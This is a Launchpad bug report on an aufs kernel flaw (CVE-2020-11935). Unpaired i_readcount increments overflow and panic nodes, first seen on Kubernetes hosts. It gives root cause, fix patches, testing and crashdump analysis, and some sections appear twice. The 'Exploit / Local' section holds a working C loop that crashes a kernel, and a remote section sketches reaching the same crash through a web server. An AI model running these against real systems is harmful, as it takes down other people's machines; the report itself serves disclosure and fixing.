Ubuntu
linux package

kernel panic hit by kube-proxy iptables-save/restore caused by aufs

Bug #1873074 reported by Mauricio Faria de Oliveira on 2020-04-15

272

This bug affects 1 person

	Status	Importance	Assigned to
linux (Ubuntu)	Fix Released	Medium	Mauricio Faria de Oliveira
Xenial	Fix Released	Medium	Mauricio Faria de Oliveira
Bionic	Fix Released	Medium	Mauricio Faria de Oliveira
Eoan	Won't Fix	Medium	Mauricio Faria de Oliveira
Focal	Fix Released	Medium	Mauricio Faria de Oliveira
Groovy	Won't Fix	Medium	Mauricio Faria de Oliveira

Bug Description

[Impact]

* Systems with aufs mounts are vulnerable to a kernel BUG(),
which can turn into a panic/crash if panic_on_oops is set.

* It is exploitable by unprivileged local users; and also
remote access operations (e.g., web server) potentially.

* This issue has also manifested in Kubernetes deployments
with a kernel panic in iptables-save or iptables-restore
after a few weeks of uptime, without user interaction.

* Usually all Kubernetes worker nodes hit the issue around
the same time.

[Fix]

* The issue is fixed with 2 patches in aufs4-linux.git:
- 515a586eeef3 aufs: do not call i_readcount_inc()
- f10aea57d39d aufs: bugfix, IMA i_readcount

* The first addresses the issue, and the second addresses a
regression in the aufs feature to change RW branches to RO.

* The kernel v5.3 aufs patches had an equivalent fix to the
second patch, which is present in the Focal aufs patchset
(and on ubuntu-unstable/master & /master-5.8 on 20200629)

- 1d26f910c53f aufs: for v5.3-rc1, maintain i_readcount
(in aufs5-linux.git)

[Test Case]

* Repeatedly open/close the same file in read-only mode in
aufs (UINT_MAX times, to overflow a signed int back to 0.)

* Alternatively, monitor the underlying filesystems's file
inode.i_readcount over several open/close system calls.
(should not monotonically increase; rather, return to 0.)

[Regression Potential]

* This changes the core path that aufs opens files, so there
   is a risk of regression; however, the fix changes aufs for
   how other filesystems work, so this generally is OK to do.
   In any case, most regressions would manifest in open() or
   close() (where the VFS handles/checks inode.i_readcount.)

* The aufs maintainer has access to an internal test-suite
   used to validate aufs changes, used to identify the first
   regression (in the branch RW/RO mode change), and then to
   validate/publish the patches upstream; should be good now.

* This has also been tested with 'stress-ng --class filesystem'
   and with 'xfstests -overlay' (patch to use aufs vs overlayfs)
   on Xenial/Bionic/Focal (-proposed vs. -proposed + patches).
   No regressions observed in stress-ng/xfstests log or dmesg.

[Other Info]

* Applied on Unstable (branches master and master-5.8)
* Not required on Groovy (still 5.4; should sync from Unstable)
* Required on LTS releases: Bionic and Focal and Xenial.
* Required on other releases: Disco and Eoan (for custom kernels)

[Original Bug Description]

Problem Report:
--------------

An user reported several nodes in their Kubernetes clusters
hit a kernel panic at about the same time, and periodically
(usually 35 days of uptime, and in same order nodes booted.)

The kernel panics message/stack trace are consistent across
nodes, in __fput() by iptables-save/restore from kube-proxy.

Example:

"""
[3016161.866702] kernel BUG at .../include/linux/fs.h:2583!
[3016161.866704] invalid opcode: 0000 [#1] SMP
...
[3016161.866780] CPU: 40 PID: 33068 Comm: iptables-restor Tainted: P OE 4.4.0-133-generic #159-Ubuntu
...
[3016161.866786] RIP: 0010:[...] [...] __fput+0x223/0x230
...
[3016161.866818] Call Trace:
[3016161.866823] [...] ____fput+0xe/0x10
[3016161.866827] [...] task_work_run+0x86/0xb0
[3016161.866831] [...] exit_to_usermode_loop+0xc2/0xd0
[3016161.866833] [...] syscall_return_slowpath+0x4e/0x60
[3016161.866839] [...] int_ret_from_sys_call+0x25/0x9f
"""

(uptime: 3016161 seconds / (24*60*60) = 34.90 days)

They have provided a crashdump (privately available) used
for analysis later in this bug report.

Note: the root cause turns out to be independent of K8s,
as explained in the Root Cause section.

Related Report:
--------------

This behavior matches this public bug of another user:
https://github.com/kubernetes/kubernetes/issues/70229

"""
I have several machines happen kernel panic，and these
machine have same dump trace like below:

KERNEL: /usr/lib/debug/boot/vmlinux-4.4.0-104-generic
...
PANIC: "kernel BUG at .../include/linux/fs.h:2582!"
...
COMMAND: "iptables-restor"
...
crash> bt
...
[exception RIP: __fput+541]
...
#8 [ffff880199f33e60] __fput at ffffffff812125ac
#9 [ffff880199f33ea8] ____fput at ffffffff812126ee
#10 [ffff880199f33eb8] task_work_run at ffffffff8109f101
#11 [ffff880199f33ef8] exit_to_usermode_loop at ffffffff81003242
#12 [ffff880199f33f30] syscall_return_slowpath at ffffffff81003c6e
#13 [ffff880199f33f50] int_ret_from_sys_call at ffffffff818449d0
...

The above showed command "iptables-restor" cause the kernel
panic and its pid is 16884，its parent process is kube-proxy.

Sometimes the process of kernel panic is "iptables-save" and
the dump trace are same.

The kernel panic always happens every 26 days(machine uptime)
"""

<< Adding further sections as comments to keep page short. >>

See original description

Tags:

CVE References

2020-11935

Revision history for this message

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

Security Impact:
---

The root cause of this problem can be easily exploited
by unprivileged users, both local and remote attackers.

It only needs access to an aufs mount point with read
permissions to any file; opening it in read-only mode,
repeatedly.

For that reason, probably sending the patch for this,
even if keeping it low profile and boring on wording,
may reveal enough information to exploit the problem,
and probably needs some care taking and coordination.

Details in 'Exploit / Local' (and Remote) sections.

Revision history for this message

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

Security Impact Surface:
---

For Kubernetes itself, this is less likely nowadays with
the move from aufs to overlayfs in Docker (which used to
be biggest driver for aufs AFAIK), and additionally, new
versions have kube-proxy call iptables-save/restore less.

The versions typically used in the Xenial timeframe (and
which may still be around) still have both (aufs default,
and kube-proxy calling iptables-save more frequently.)

Detailed version numbers for Docker/Kubernetes for that
information can be provided if needed.

...

For the root cause (i.e., independently of Kubernetes),

This affects any distribution which ships aufs filesystem
AND enables CONFIG_IMA (sufficient until the 5.3 kernel)
OR enables CONFIG_FILE_LOCKING (new with the 5.3 kernel);

(either CONFIG option enables i_readcount/that BUG_ON())

Ubuntu:
--

This is true for all supported Ubuntu releases (T/X/B/E/F),
which ships aufs in the kernel packages as a kernel module.

Debian:
--

This affects Debian too, which ships aufs-dkms to build it.

This is true for Debian Stretch (oldstable) with 4.9 kernel.

This is not, for Debian Buster (stable) with the 4.19 kernel
(as CONFIG_IMA was disabled on 4.16 in Debian, g82596c5122fe)

BUT buster-backports has 5.4 kernel; so if aufs-dkms goes on
to support it, the problem would be exposed on Debian Buster.

This is true for Debian Bullseye (testing), again pending on
support from aufs-dkms, it is currently locked to 5.2 kernel,
via this DKMS directive (BUILD_EXCLUSIVE_KERNEL="^5.2.*").

Other Distros:
--

Apparently the official support for aufs is not too present
on other distros as it's not in the upstream/mainline Linux,
but there are distro-community efforts that provide it.
- Arch Linux User Repository/AUR
- CentOS community/custom packages on top of
kernel-lt (longterm) and kernel-ml (mainline) stable pkgs.

Those were not checked.

Revision history for this message

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

Root Cause:
----------

Note: this is completely independent of Kubernetes.

The aufs filesystem calls i_readcount_inc() when opening a
file in read-only mode, not paired with an i_readcount_dec().

@ fs/aufs/vfsub.c

struct file *vfsub_dentry_open(struct path *path, int flags)
{
struct file *file;

    file = dentry_open(path, flags /* | __FMODE_NONOTIFY */,
                       current_cred());
    if (!IS_ERR_OR_NULL(file)
        && (file->f_mode & (FMODE_READ | FMODE_WRITE)) == FMODE_READ)
            i_readcount_inc(d_inode(path->dentry));

return file;
}

That is _incorrect_ as only the VFS layer should maintain
the 'struct inode.i_readcount' value.

Neither of i_readcount_inc() or i_readcount_dec() should
happen there. They don't exist out of VFS on Linux tree.

So,

If the same file is opened in read-only mode so many times,
its backing inode.i_readcount value overflows back to zero.

Once that happens, when the file is closed, __fput() calls
i_readcount_dec(), and that will trigger the BUG_ON().

That causes a kernel panic/crash if panic_on_oops is set;
otherwise, just kernel messages.

By default it's not, but usually the 'enterprise'/larger
users set it so to save kernel crashdumps on such errors.

See the 'Problem Demonstration / Instrumentation' section
to watch the number to overflow and hit the BUG_ON/panic.

Revision history for this message

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

Workaround:
---

Clean the inode cache, which should remove the inode from
memory, and when it's needed again, it's initialized with
i_readcount zero.

$ echo 2 | sudo tee /proc/sys/vm/drop_caches

This may happen indirectly from time to time on systems,
as part of normal memory cleansing/reclaiming, and thus
the problem might be avoided or never noticed.

This might impact performance, as the inode and dentry
caches are flushed.

Revision history for this message

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

Fix:
---

Patch attached ("aufs-do-not-call-i_readcount_inc.patch").

This applies to Ubuntu kernels, aufs upstream, and other
distros's aufs (e.g. Debian aufs-dkms package.)

Attached analysis of the aufs change back in Linux v2.6.39
that introduced the problem ("aufs-intro-i_readcount_inc"),
explaining what happened and why that change is incorrect.

Revision history for this message

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

aufs-do-not-call-i_readcount_inc.patch Edit (4.0 KiB, text/plain)

Revision history for this message

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

Regression Testing:
---

The fix ran through regression testing with three tools.

No regressions observed between original/patched 5.4.0-21.
- 5.4.0-21-generic #25-Ubuntu SMP Sat Mar 28 13:10:28 UTC 2020
- 5.4.0-21-generic #25+aufs SMP Fri Apr 3 12:09:29 -03 2020

1) stress-ng (on host, and on kube-proxy's aufs mount)

Command: stress-ng --class filesystem --sequential 0 --timeout 5m
(takes about 3 hours to finish.)

The stress-ng logs were normalized for PID/process number
and unique messages then compared. There's no unexpected
new error messages. Also compared the dmesg output.

The runs on the kube-proxy's aufs mountpoint consisted
of finding which /var/lib/docker/aufs/mnt/ directory
is used by kube-proxy (which triggered the problem)
and running stress-ng over there.

2) xfstests-dev, patched to use aufs instead of overlayfs

The xfstests-dev patch is attached ("xfstests-aufs.patch").
It's not yet upstream -- working on v2 for upstream which
also covers fuse-overlayfs.

The set of test failures is identical for original/patched
kernels, seen as one single unique line across the 2 logs:

$ grep -h '^Failures:' xfstests.{orig,patch}.log | sort -u | wc -l
1

And the number of failures is (of course, identical.)

"Failed 357 of 648 tests."

Command: "./check -overlay -E /tmp/exclude-tests" with
10 tests excluded, which hang the kernel/blocks tasks.
(steps/details available in the patch message.)

3) smoke test for aufs (from the kernel team)

The smoke test for aufs from the kernel team is located at:
https://kernel.ubuntu.com/git/ubuntu/autotest-client-tests.git/tree/ubuntu_aufs_smoke_test/ubuntu_aufs_smoke_test.sh

Its output is identical on original/patched kernel.

Revision history for this message

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

Exploit / Local:
---

The local exploit is trivial as 'mount | grep aufs' says
whether there's an aufs mountpoint, and usually there is
a file that is 'chmod o+r' that any user could read/open.

(This crashed a virtual machine in 8 hours, overnight.)
See section 'Exploit / Local' below.

Code:

    $ cat <<EOF >exploit.c
    #include <fcntl.h>
    #include <unistd.h>
    int main() { while (!close(open("test", O_RDONLY))); return 0; }
    EOF

$ gcc -o /tmp/exploit exploit.c

Setup:

    $ mkdir dir mnt
    $ touch dir/test
    $ sudo mount -t aufs -o br=dir none mnt

$ ls mnt
test

Run:

$ cd mnt && /tmp/exploit
<just let it run until..>

    [29167.866016] kernel BUG at include/linux/fs.h:2963!
    [29167.867423] invalid opcode: 0000 [#1] SMP PTI
    [29167.868584] CPU: 0 PID: 5314 Comm: exploit Tainted: G OE 5.4.0-21-generic #25-Ubuntu
    [29167.870751] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014
    [29167.873202] RIP: 0010:__fput+0x25d/0x260
    ...
    [29167.901583] Call Trace:
    [29167.902387] ____fput+0xe/0x10
    [29167.903344] task_work_run+0x8f/0xb0
    [29167.904420] exit_to_usermode_loop+0x131/0x160
    [29167.905749] do_syscall_64+0x163/0x190
    [29167.906929] entry_SYSCALL_64_after_hwframe+0x44/0xa9
    ...
    [29167.967808] Kernel panic - not syncing: Fatal exception

(uptime = 29167 seconds / 3600 seconds/hour = 8.10 hours)

Revision history for this message

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

Exploit / Remote:
---

The remote exploit is possible if such file is opened in
response to an event, for example, a web server document
stored in an aufs mountpoint.

This obviously takes more time - each i_readcount_inc() is
delayed by a remote access - but it may be sped up by many
attackers, say a DDoS, if it's possible to figure or brute
force which URLs lead to an aufs-backed file in the server.

(This can happen with Kubernetes/docker containers using
the aufs storage driver for container images for example,
with static document in the container image, and exposed
via a web server, say nginx, a very popular docker image.)

See the 'Problem Demonstration' section w/ this example.

Revision history for this message

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

#10

Download full text (7.0 KiB)

Problem Demonstration / Instrumentation:
---------------------------------------

This kprobe kernel module ("kmod-kprobe-fput.c") inserts a
probe on __fput(), and prints the i_readcount value before
before decrementing it, when a specified filename is found.
(usage/steps on header comments.)

$ sudo insmod kmod-kprobe-fput.ko
[ 315.625113] kmod_kprobe_fput: kprobe registered (filename: test, multiple: 0)

The i_readcount value is only incremeted on reads, not writes:

$ touch test
[ 308.193058] file: test, fs type: ext4, inode readcount: 0

$ > test
[ 310.293847] file: test, fs type: ext4, inode readcount: 0

$ cat test
[ 312.667149] file: test, fs type: ext4, inode readcount: 1

$ cat test
[ 317.312413] file: test, fs type: ext4, inode readcount: 1

$ cat test
[ 319.223841] file: test, fs type: ext4, inode readcount: 1

It is decremented only when the file is closed:

    $ tail -f test &
    $ tail -f test &
    $ tail -f test &

$ cat test
[ 365.042632] file: test, fs type: ext4, inode readcount: 4

$ kill %%
[ 372.241224] file: test, fs type: ext4, inode readcount: 3

$ kill %%
[ 376.151455] file: test, fs type: ext4, inode readcount: 2

$ kill %%
[ 378.802151] file: test, fs type: ext4, inode readcount: 1

With aufs, there are 2 files/inodes, one in the virtual/aufs
filesystem, another in the (underlying) real/ext4 filesystem.
Then aufs handles/redirects the open/read/write calls to it.

    $ mkdir dir mnt
    $ touch dir/test
    $ sudo mount -t aufs -o br=dir none mnt

$ ls mnt
test

The problem is observable upfront: i_readcount for the real
inode/filesystem is extra incremented on the read-only open.

    $ cat mnt/test
    [ 453.819165] file: test, fs type: aufs, inode readcount: 1
    [ 453.819226] file: test, fs type: ext4, inode readcount: 2

    $ cat mnt/test
    [ 458.091550] file: test, fs type: aufs, inode readcount: 1
    [ 458.091599] file: test, fs type: ext4, inode readcount: 3

    $ cat mnt/test
    [ 463.165711] file: test, fs type: aufs, inode readcount: 1
    [ 463.165759] file: test, fs type: ext4, inode readcount: 4

Compare that with the non-aufs/ext4-only output above for
multiple cats ;-) - the inode's i_readcount on ext4 grows.

...

That kprobe was enabled during the 'Exploit / Local' run.

The logs show the i_readcount value incrementing until it
overflowed, when the BUG_ON()/panic happened, and crashed.

(The 'multiple' parameter only prints when i_readcount is
a multiple of its value, in unsigned type.)

$ sudo insmod kmod-kprobe-fput.ko multiple=100000
[ 1684.953480] kmod_kprobe_fput: kprobe registered (filename: test, multiple: 100000)

Problem Demonstration / Instrumentation:
---------------------------------------

$ sudo insmod kmod-kprobe-fput.ko 
    [  315.625113] kmod_kprobe_fput: kprobe registered (filename: test, multiple: 0)

The i_readcount value is only incremeted on reads, not writes:

$ touch test
    [  308.193058] file: test, fs type: ext4, inode readcount: 0

$ > test
    [  310.293847] file: test, fs type: ext4, inode readcount: 0

$ cat test
    [  312.667149] file: test, fs type: ext4, inode readcount: 1

$ cat test
    [  317.312413] file: test, fs type: ext4, inode readcount: 1

$ cat test
    [  319.223841] file: test, fs type: ext4, inode readcount: 1

It is decremented only when the file is closed:

$ tail -f test &
    $ tail -f test &
    $ tail -f test &

$ cat test
    [  365.042632] file: test, fs type: ext4, inode readcount: 4

$ kill %%
    [  372.241224] file: test, fs type: ext4, inode readcount: 3

$ kill %%
    [  376.151455] file: test, fs type: ext4, inode readcount: 2

$ kill %%
    [  378.802151] file: test, fs type: ext4, inode readcount: 1

With aufs, there are 2 files/inodes, one in the virtual/aufs
filesystem, another in the (underlying) real/ext4 filesystem.
Then aufs handles/redirects the open/read/write calls to it.

$ mkdir dir mnt
    $ touch dir/test
    $ sudo mount -t aufs -o br=dir none mnt

$ ls mnt
    test

The problem is observable upfront: i_readcount for the real
inode/filesystem is extra incremented on the read-only open.

$ cat mnt/test
    [  453.819165] file: test, fs type: aufs, inode readcount: 1
    [  453.819226] file: test, fs type: ext4, inode readcount: 2

$ cat mnt/test
    [  458.091550] file: test, fs type: aufs, inode readcount: 1
    [  458.091599] file: test, fs type: ext4, inode readcount: 3

$ cat mnt/test
    [  463.165711] file: test, fs type: aufs, inode readcount: 1
    [  463.165759] file: test, fs type: ext4, inode readcount: 4

Compare that with the non-aufs/ext4-only output above for
multiple cats ;-) - the inode's i_readcount on ext4 grows.

...

That kprobe was enabled during the 'Exploit / Local' run.

The logs show the i_readcount value incrementing until it
overflowed, when the BUG_ON()/panic happened, and crashed.

(The 'multiple' parameter only prints when i_readcount is
a multiple of its value, in unsigned type.)

$ sudo insmod kmod-kprobe-fput.ko multiple=100000
    [ 1684.953480] kmod_kprobe_fput: kprobe registered (filename: test, multiple: 100000)

$ cd mnt && /tmp/exploit
    [ 1799.795277] file: test, fs type: ext4, inode readcount: 100000
    [ 1800.420418] file: test, fs type: ext4, inode readcount: 200000
    [ 1801.030687] file: test, fs type: ext4, inode readcount: 300000
    ...
    [ 2428.610831] file: test, fs type: ext4, inode readcount: 100000000
    ...
    [ 7909.385033] file: test, fs type: ext4, inode readcount: 1000000000
    ...
    [14191.533372] file: test, fs type: ext4, inode readcount: 2000000000
    ...
    [15156.688678] file: test, fs type: ext4, inode readcount: 2147400000
    [15157.432852] file: test, fs type: ext4, inode readcount: -2147451616
    ...
    [16123.045186] file: test, fs type: ext4, inode readcount: -2000051616
    ...
    [22655.214420] file: test, fs type: ext4, inode readcount: -1000051616
    ...
    [28517.303066] file: test, fs type: ext4, inode readcount: -100051616
    ...
    [29161.058111] file: test, fs type: ext4, inode readcount: -1051616
    [29161.702771] file: test, fs type: ext4, inode readcount: -951616
    [29162.337571] file: test, fs type: ext4, inode readcount: -851616
    [29162.980385] file: test, fs type: ext4, inode readcount: -751616
    [29163.614763] file: test, fs type: ext4, inode readcount: -651616
    [29164.253970] file: test, fs type: ext4, inode readcount: -551616
    [29164.890793] file: test, fs type: ext4, inode readcount: -451616
    [29165.566457] file: test, fs type: ext4, inode readcount: -351616
    [29166.224213] file: test, fs type: ext4, inode readcount: -251616
    [29166.879175] file: test, fs type: ext4, inode readcount: -151616
    [29167.528966] file: test, fs type: ext4, inode readcount: -51616
    [29167.862871] file: test, fs type: ext4, inode readcount: 0
    [29167.864633] ------------[ cut here ]------------
    [29167.866016] kernel BUG at include/linux/fs.h:2963!
    [29167.867423] invalid opcode: 0000 [#1] SMP PTI
    [29167.868584] CPU: 0 PID: 5314 Comm: exploit Tainted: G           OE     5.4.0-21-generic #25-Ubuntu
    [29167.870751] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014
    [29167.873202] RIP: 0010:__fput+0x25d/0x260
    ...
    [29167.901583] Call Trace:
    [29167.902387]  ____fput+0xe/0x10
    [29167.903344]  task_work_run+0x8f/0xb0
    [29167.904420]  exit_to_usermode_loop+0x131/0x160
    [29167.905749]  do_syscall_64+0x163/0x190
    [29167.906929]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
    ...
    [29167.967808] Kernel panic - not syncing: Fatal exception

Example of Web Server / nginx with Kubernetes
--

The same i_readcount() increments are obtained to the
'index.html' page served by nginx, as that is stored
in the container image, thus accessed via aufs.

(After deploying Kubernetes/Docker with aufs storage driver)

Start nginx pod/container:

$ kubectl run web-server --image=nginx

Get its IP address:

$ kubectl get pods -o wide
    NAME         READY   STATUS    RESTARTS   AGE   IP          NODE             NOMINATED NODE   READINESS GATES
    web-server   1/1     Running   0          48s   10.10.0.4   sf244755-focal   <none>           <none>

Test it:

$ curl -s 10.10.0.4 | grep title
    <title>Welcome to nginx!</title>

$ sudo insmod kmod-kprobe-fput.ko filename=index.html
    [ 3735.601633] kmod_kprobe_fput: kprobe registered (filename: index.html, multiple: 0)

$ curl -s 10.10.0.4 >/dev/null
    [ 3757.368671] file: index.html, fs type: aufs, inode readcount: 1
    [ 3757.381055] file: index.html, fs type: ext4, inode readcount: 7

$ curl -s 10.10.0.4 >/dev/null
    [ 3767.402218] file: index.html, fs type: aufs, inode readcount: 1
    [ 3767.407846] file: index.html, fs type: ext4, inode readcount: 8

$ curl -s 10.10.0.4 >/dev/null
    [ 3771.856605] file: index.html, fs type: aufs, inode readcount: 1
    [ 3771.866484] file: index.html, fs type: ext4, inode readcount: 9

And the web server can be exposed/made available externally,
for example:

$ kubectl expose pod web-server --port 80 --type NodePort

$ kubectl get services web-server
    NAME         TYPE       CLUSTER-IP    EXTERNAL-IP   PORT(S)        AGE
    web-server   NodePort   10.100.0.69   <none>        80:32089/TCP   6s

another-host$ curl -s 192.168.122.151:32089 | grep title
    <title>Welcome to nginx!</title>

[ 4037.893050] file: index.html, fs type: aufs, inode readcount: 1
    [ 4037.909541] file: index.html, fs type: ext4, inode readcount: 10

Revision history for this message

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

#11

kmod-kprobe-fput.c Edit (2.2 KiB, text/x-csrc)

Revision history for this message

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

#12

Download full text (16.0 KiB)

Crashdump Analysis:
------------------

Part 1) Where

The BUG_ON() in fs.h:2583 originates from i_readcount_dec().

This function decrements the struct inode.i_readcount field,
but first it checks if that got to zero before decrementing
(which indeed indicates a bug with the i_readcount balance.)

    2580 #ifdef CONFIG_IMA
    2581 static inline void i_readcount_dec(struct inode *inode)
    2582 {
    2583 BUG_ON(!atomic_read(&inode->i_readcount));
    2584 atomic_dec(&inode->i_readcount);
    2585 }

So, that happened: i_readcount_dec() found i_readcount to be
zero, which is not expected, and trigerred the BUG_ON() call.

This is indeed called from __fput():

    187 static void __fput(struct file *file)
    ...
    217 if ((file->f_mode & (FMODE_READ | FMODE_WRITE)) == FMODE_READ)
    218 i_readcount_dec(inode);

From the crashdump, we can confirm that i_readcount (value
in the EAX register) is indeed zero, and that jumps to ud2
(undefined/invalid opcode in BUG()) at offset 0x223 = 547.)

    crash> disass -x __fput
    ...
       0xffffffff81218ad2 <+418>: mov 0x154(%r13),%eax
       0xffffffff81218ad9 <+425>: test %eax,%eax
       0xffffffff81218adb <+427>: je 0xffffffff81218b53 <__fput+547>
    ...
       0xffffffff81218b53 <+547>: ud2

    crash> bt
    ...
        [exception RIP: __fput+547]
    ...
        RAX: 0000000000000000 RBX: ffff882a32191c00 RCX: 000000001b1a76dc
    ...

Part 2) What

Looking at which 'struct file' triggered this problem,
we have 'struct inode.i_readcount' at R13 + 0x154, so
inode is at R13 since i_readcount offset is 0x154.

    crash> struct -x -o inode.i_readcount
    struct inode {
      [0x154] atomic_t i_readcount;
    }

    crash> bt
    ...
        R13: ffff883f2ad40e90 R14: ffff887f6368d0a0 R15: ffff883f2ad0d200
    ...

So, inode = ffff883f2ad40e90

Checking the assembly for 'struct file', it's kept at RBx (above.)

So, file = ffff882a32191c00

And the inode pointer in file does match the value we have, good.

crash> struct -x file.f_inode ffff882a32191c00
f_inode = 0xffff883f2ad40e90

Now, walking up the file's dentry chain, we get the path:

crash> struct -x file.f_path.dentry ffff882a32191c00
f_path.dentry = 0xffff883f2ad0d200

    crash> struct -x dentry.d_name.name,d_parent 0xffff883f2ad0d200
      d_name.name = 0xffff883f2ad0d238 "protocols"
      d_parent = 0xffff883f42a33080

    crash> struct -x dentry.d_name.name,d_parent 0xffff883f42a33080
      d_name.name = 0xffff883f42a330b8 "etc"
      d_parent = 0xffff883f5d747b00

    crash> struct -x dentry.d_name.name,d_parent 0xffff883f5d747b00
      d_name.name = 0xffff883f4e892b50 "7e8d17d0d767bad43bbab4953b457660e2ad9d61162efd00261db0b36c1f7558"
      d_parent = 0xffff883f619cc480

    crash> struct -x dentry.d_name.name,d_parent 0xffff883f619cc480
      d_name.name = 0xffff883f619cc4b8 "diff"
      d_parent = 0xffff883f619ccc00

    crash> struct -x dentry.d_name.name,d_parent 0xffff883f619ccc00
      d_name.name = 0xffff883f619ccc38 "aufs"
      d_parent = 0xffff883f61930780

crash> struct -x dentry.d_name.name,d_parent 0xffff883f61930780
d...

Crashdump Analysis:
------------------

Part 1) Where

The BUG_ON() in fs.h:2583 originates from i_readcount_dec().

This function decrements the struct inode.i_readcount field,
but first it checks if that got to zero before decrementing
(which indeed indicates a bug with the i_readcount balance.)

2580 #ifdef CONFIG_IMA
    2581 static inline void i_readcount_dec(struct inode *inode)
    2582 {
    2583         BUG_ON(!atomic_read(&inode->i_readcount));
    2584         atomic_dec(&inode->i_readcount);
    2585 }

So, that happened: i_readcount_dec() found i_readcount to be
zero, which is not expected, and trigerred the BUG_ON() call.

This is indeed called from __fput():

187 static void __fput(struct file *file)
    ...
    217         if ((file->f_mode & (FMODE_READ | FMODE_WRITE)) == FMODE_READ)
    218                 i_readcount_dec(inode);

From the crashdump, we can confirm that i_readcount (value
in the EAX register) is indeed zero, and that jumps to ud2
(undefined/invalid opcode in BUG()) at offset 0x223 = 547.)

crash> disass -x __fput
    ...
       0xffffffff81218ad2 <+418>:   mov    0x154(%r13),%eax
       0xffffffff81218ad9 <+425>:   test   %eax,%eax
       0xffffffff81218adb <+427>:   je     0xffffffff81218b53 <__fput+547>
    ...
       0xffffffff81218b53 <+547>:   ud2

crash> bt
    ...
        [exception RIP: __fput+547]
    ...
        RAX: 0000000000000000  RBX: ffff882a32191c00  RCX: 000000001b1a76dc
    ...

Part 2) What

Looking at which 'struct file' triggered this problem,
we have 'struct inode.i_readcount' at R13 + 0x154, so
inode is at R13 since i_readcount offset is 0x154.

crash> struct -x -o inode.i_readcount
    struct inode {
      [0x154] atomic_t i_readcount;
    }

crash> bt
    ...
        R13: ffff883f2ad40e90  R14: ffff887f6368d0a0  R15: ffff883f2ad0d200
    ...

So, inode = ffff883f2ad40e90

Checking the assembly for 'struct file', it's kept at RBx (above.)

So, file = ffff882a32191c00

And the inode pointer in file does match the value we have, good.

crash> struct -x file.f_inode ffff882a32191c00
      f_inode = 0xffff883f2ad40e90

Now, walking up the file's dentry chain, we get the path:

crash> struct -x file.f_path.dentry ffff882a32191c00
      f_path.dentry = 0xffff883f2ad0d200

crash> struct -x dentry.d_name.name,d_parent 0xffff883f2ad0d200
      d_name.name = 0xffff883f2ad0d238 "protocols"
      d_parent = 0xffff883f42a33080

crash> struct -x dentry.d_name.name,d_parent 0xffff883f42a33080
      d_name.name = 0xffff883f42a330b8 "etc"
      d_parent = 0xffff883f5d747b00

crash> struct -x dentry.d_name.name,d_parent 0xffff883f619cc480
      d_name.name = 0xffff883f619cc4b8 "diff"
      d_parent = 0xffff883f619ccc00

crash> struct -x dentry.d_name.name,d_parent 0xffff883f619ccc00
      d_name.name = 0xffff883f619ccc38 "aufs"
      d_parent = 0xffff883f61930780

crash> struct -x dentry.d_name.name,d_parent 0xffff883f61930780
      d_name.name = 0xffff883f619307b8 "docker"
      d_parent = 0xffff887f5e8b9bc0

crash> struct -x dentry.d_name.name,d_parent 0xffff887f5e8b9bc0
      d_name.name = 0xffff887f5e8b9bf8 "/"
      d_parent = 0xffff887f5e8b9bc0

And that file/path is on top of this mount point:

crash> struct -x file.f_path.mnt ffff882a32191c00
      f_path.mnt = 0xffff887f6368d0a0,

crash> struct -x vfsmount.mnt_sb 0xffff887f6368d0a0
      mnt_sb = 0xffff887f63a7c000

crash> mount | grep ffff887f63a7c000
    ffff887f6368d080 ffff887f63a7c000 xfs    /dev/nvme0n1 /opt/k8s

So the full path to the file is:

/opt/k8s/docker/aufs/diff/7e8d17d0d767bad43bbab4953b457660e2ad9d61162efd00261db0b36c1f7558/etc/protocols

And indeed, iptables-save/restore use the /etc/procotols file
to check for protocol/port numbers used by the iptables rules
(code from iptables package version 1.6.0-2ubuntu3 on Ubuntu.)

@ iptables/iptables-save.c
    iptables_save_main() -> do_output() -> print_rule4() -> print_proto() -> getprotobynumber() -> /etc/protocols

@iptables/iptables-restore.c
    iptables_restore_main() -> do_command4() / case 'p' -> xtables_parse_protocol() -> getprotobyname() -> /etc/protocols

Important:

Interestingly the problem happened with the real file on disk
rather than with the virtual file in the aufs mount point for
the container kube-proxy (and iptables-save/restore) run from.

This user had another crashdump on Ubuntu Yakkety 4.8 kernel,
with same file (/opt/k8s/docker/aufs/diff/.../etc/protocols).

Part 3) Why

Long story short.

After exploring the possible paths that update i_readcount,
and failing to find any theory or actual problem which may
have caused it to become unbalanced negatively (additional
decrements or less increments) finally this not so obvious
"opposite" seemed to be the problem:

i_readcount to become unbalanced _positively_ (e.g., due to
additional increments), until it overflows a 32-bit integer
limit (the atomic type) back to zero.

And, sure enough, aufs has an (unpaired) i_readcount_inc().

Also, if affects the inode of the real file on disk, not
of the virtual file in aufs, which matches our crashdump.

...

This seemed unlikely but does make sense/explain the long
time to reproduce the problem (25-35 days) for both users.

And it also does make sense/explain several systems doing
similar things then crashing around similar times.

(on this particular user/example, the kube-proxy calls to
iptables-save/restore happen as a response to kubernetes
services changes and on a periodic basis too, thus since
the systems are big, probably running many services, and
changing services/network rules often, the rate of calls
may have become high enough to trigger it over the weeks.)

...

Part 4) Really?

In order to confirm it, looking at the crashdump, there
are several inodes in the underlying/backing filesystem;
indeed with very unbalanced/large values in i_readcount.

Looking at the inodes list of the superblock mentioned,
let's list the top 20 values for i_readcount.

crash> mount | grep ffff887f63a7c000
    ffff887f6368d080 ffff887f63a7c000 xfs    /dev/nvme0n1 /opt/k8s

crash> struct -o super_block.s_inodes ffff887f63a7c000
    struct super_block {
      [ffff887f63a7c608] struct list_head s_inodes;
    }

crash> list -S inode.i_readcount.counter -l inode.i_sb_list -H ffff887f63a7c608 | grep i_readcount.counter | sort -rn -k3,3 | head -n20
      i_readcount.counter = 755438589
      i_readcount.counter = 14799006
      i_readcount.counter = 11247257
